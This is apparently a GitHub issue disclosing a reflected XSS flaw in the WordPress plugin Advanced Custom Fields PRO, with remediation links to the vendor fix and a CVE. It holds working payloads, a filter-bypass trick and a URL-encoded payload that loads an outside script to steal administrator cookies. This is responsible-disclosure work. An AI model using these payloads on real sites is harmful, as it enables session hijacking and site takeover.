Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reflected XSS in WordPress for 'Advanced Custom Fields PRO' plugin #1

Open
jdordonezn opened this issue Jan 20, 2021 · 0 comments
Open

Comments

@jdordonezn
Copy link
Owner

jdordonezn commented Jan 20, 2021

WordPress allows 'Cross-site Scripting Reflected' in resource edit.php, because the call an update page of Advanced Custom Fields PRO (Versions before 5.9.1) plugin, enable injections of JavaScript code.

Steps to reproduce the vulnerability

  1. Add the payload XSS at the end of the url, so:
    https://SiteWithWordpress/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>

  2. However, after of try some payloads I see the [space] character is replaced in the response with underscore character [ _ ], the same goes for dot character [ . ], whereby not is possible inject useful payloads for extract for example the cookie of the session.
    Problem

  3. I found a way to bypass this problem, in the request replace [space] character for [%0c ] and dot character [ . ] for equivalent html encode, this content is rendered successfully due the response is an HTML page.
    Payload

  4. Now, is time for making the script for sending cookies of administrator user to evil server of hacker, for example
    Request_JS

  5. Of course, previously must encode in URL the payload that calls previous script, so https://WordPressDomain/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"XSS%22%3e%3c%73%63%72%69%70%74%0c%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%32%65%32%30%30%32%66%39%26%23%78%32%65%3b%6e%67%72%6f%6b%26%23%78%32%65%3b%69%6f%2f%72%65%71%75%65%73%74%26%23%78%32%65%3b%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
    XSS1

  6. Send the payload and you will see two request, the first make a promise for sending the cookies and second is where the promise is executed.
    XSS2

  7. Now the hacker has cookies of administrator user in the evil server.
    XSS3

Remediation

I held messages with the dev team of Advanced Custom Fields, they fixed the vulnerability in the versión 5.9.1 of ACF PRO, here is the report:
https://www.advancedcustomfields.com/blog/acf-5-9-1-release/
https://wpscan.com/vulnerability/d1e9c995-37bd-4952-b88e-945e02e3c83f
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24241

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant